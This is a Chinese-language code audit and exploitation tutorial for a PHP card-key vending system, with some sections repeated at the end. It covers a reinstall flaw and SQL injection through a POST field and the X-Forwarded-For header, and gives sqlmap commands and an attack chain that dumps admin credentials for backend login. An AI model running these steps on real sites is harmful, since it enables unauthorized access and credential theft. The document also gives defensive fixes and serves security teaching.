自助提卡系统代码审计与漏洞利用教学文档<\/h1>

1. 系统概述<\/h2>
本教学文档基于对一款PHP+MySQL开发的自助提卡系统的代码审计结果。该系统主要用于24小时自动售卡平台，常见于违法网站用于提卡密或购买邀请码。<\/p>

2. 审计环境<\/h2>

源码类型：开源PHP自助提卡系统<\/li>
数据库：MySQL<\/li>

主要漏洞类型：

Forwarded-For注入<\/li>
重装漏洞<\/li>

SQL注入<\/li> <\/ul> <\/li> <\/ul>

3. 漏洞分析<\/h2>

3.1 重装漏洞<\/h3>

文件路径<\/strong>：install\/index.php<\/p>

漏洞代码<\/strong>：<\/p>

\/\/ 判断是否存在lock文件并且step不等于5的情况下执行判断语句中的代码
<\/span><\/span><\/span><\/span>if<\/span>(条件满足<\/span>) {
<\/span><\/span>    header<\/span>("Location: install\/index.php"<\/span>);
<\/span><\/span>    \/\/ 缺少exit语句
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/strong>：<\/p>

程序在安装完成后会在install目录下生成lock文件<\/li>
检查安装状态时仅通过header跳转，未使用exit终止后续代码执行<\/li>
攻击者可删除lock文件重新安装系统<\/li>
<\/ul>
3.2 SQL注入漏洞（API接口）<\/h3>
文件路径<\/strong>：api.php<\/p>
漏洞代码<\/strong>：<\/p>
if<\/span>(isset<\/span>($_POST["dh"<\/span>]) &&<\/span> !<\/span>empty<\/span>($_POST["dh"<\/span>])) {
<\/span><\/span>    $sql =<\/span> "SELECT * FROM xxx WHERE dh='"<\/span>.<\/span>$_POST["dh"<\/span>].<\/span>"'"<\/span>;
<\/span><\/span>    \/\/ 直接拼接用户输入到SQL语句
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>
python sqlmap.py -u "http:\/\/target\/index.php"<\/span> --batch --dbms=<\/span>"mysql"<\/span> --data=<\/span>"dh=a"<\/span>
<\/span><\/span><\/code><\/pre>3.3 Forwarded-For注入漏洞<\/h3>
核心文件<\/strong>：pay\/pay.php<\/p>
3.3.1 漏洞代码分析<\/h4>
IP获取函数<\/strong>：<\/p>
function<\/span> getip<\/span>() {
<\/span><\/span>    if<\/span>(getenv<\/span>('HTTP_X_FORWARDED_FOR'<\/span>)) {
<\/span><\/span>        $ip =<\/span> getenv<\/span>('HTTP_X_FORWARDED_FOR'<\/span>);
<\/span><\/span>    } elseif<\/span>(getenv<\/span>('HTTP_CLIENT_IP'<\/span>)) {
<\/span><\/span>        $ip =<\/span> getenv<\/span>('HTTP_CLIENT_IP'<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $ip =<\/span> $_SERVER['REMOTE_ADDR'<\/span>];
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $ip; \/\/ 未做任何过滤
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>SQL拼接点<\/strong>：<\/p>
\/\/ 删除操作时
<\/span><\/span><\/span><\/span>if<\/span>($_GET["type"<\/span>] ==<\/span> "delete"<\/span>) {
<\/span><\/span>    $sql =<\/span> "SELECT * FROM xxx WHERE ip='"<\/span>.<\/span>getip<\/span>().<\/span>"'"<\/span>;
<\/span><\/span>    \/\/ 直接拼接未过滤的IP到SQL语句
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 支付操作时
<\/span><\/span><\/span><\/span>$sql =<\/span> "INSERT INTO xxx (ip) VALUES ('"<\/span>.<\/span>getip<\/span>().<\/span>"')"<\/span>;
<\/span><\/span><\/code><\/pre>3.3.2 漏洞利用条件<\/h4>
需要构造以下GET参数：<\/p>
type=zfb&money=1&title=adssad&pwd=123&spid=1
<\/code><\/pre>
3.3.3 利用方法<\/h4>

使用Burp Suite抓包，修改X-Forwarded-For头为注入payload<\/li>
保存请求为文本文件(test.txt)<\/li>
使用SQLMap进行自动化注入：<\/li>
<\/ol>
python sqlmap.py -r test.txt --batch --dbms=<\/span>"mysql"<\/span>
<\/span><\/span>python sqlmap.py -r test.txt --batch -D 数据库名 --tables
<\/span><\/span>python sqlmap.py -r test.txt --batch -D 数据库名 -T admin --dump
<\/span><\/span><\/code><\/pre>优势<\/strong>：<\/p>

绕过WAF：许多WAF不会检测header参数<\/li>
高成功率：系统完全信任客户端提供的IP头信息<\/li>
<\/ul>
4. 完整攻击链演示<\/h2>


信息收集<\/strong>：<\/p>

确认系统版本是否为易受攻击版本<\/li>
检查\/install\/<\/code>目录是否存在<\/li>
<\/ul>
<\/li>

利用Forwarded-For注入<\/strong>：<\/p>

访问支付页面：http:\/\/target\/pay\/index.php?type=zfb&money=1&title=adssad&pwd=123&spid=1<\/code><\/li>
拦截请求并修改X-Forwarded-For头<\/li>
<\/ul>
<\/li>

数据库枚举<\/strong>：<\/p>

获取数据库名<\/li>
枚举表名（重点关注admin表）<\/li>
导出管理员凭证<\/li>
<\/ul>
<\/li>

后台登录<\/strong>：<\/p>

访问默认后台：http:\/\/target\/admin.php<\/code><\/li>
使用获取的凭证登录<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>


输入过滤<\/strong>：<\/p>

对HTTP头信息进行严格过滤<\/li>
使用预编译语句或参数化查询<\/li>
<\/ul>
<\/li>

安装防护<\/strong>：<\/p>

安装完成后自动删除install目录<\/li>
在跳转后添加exit语句<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

数据库使用最小权限原则<\/li>
后台地址可配置化，不使用固定路径<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

记录异常IP头访问<\/li>
监控SQL错误日志<\/li>
<\/ul>
<\/li>
<\/ol>
6. 法律声明<\/h2>
本文所述技术仅限用于合法安全测试与研究，未经授权对他人系统进行测试属于违法行为，后果自负。<\/p>

自助提卡系统代码审计与漏洞利用教学文档<\/h1>

1. 系统概述<\/h2> 本教学文档基于对一款PHP+MySQL开发的自助提卡系统的代码审计结果。该系统主要用于24小时自动售卡平台，常见于违法网站用于提卡密或购买邀请码。<\/p>

3. 漏洞分析<\/h2>

3.3 Forwarded-For注入漏洞<\/h3> 核心文件<\/strong>：pay\/pay.php<\/p>

6. 法律声明<\/h2> 本文所述技术仅限用于合法安全测试与研究，未经授权对他人系统进行测试属于违法行为，后果自负。<\/p>

1. 系统概述<\/h2>
本教学文档基于对一款PHP+MySQL开发的自助提卡系统的代码审计结果。该系统主要用于24小时自动售卡平台，常见于违法网站用于提卡密或购买邀请码。<\/p>

3.3 Forwarded-For注入漏洞<\/h3>
核心文件<\/strong>：pay\/pay.php<\/p>

6. 法律声明<\/h2>
本文所述技术仅限用于合法安全测试与研究，未经授权对他人系统进行测试属于违法行为，后果自负。<\/p>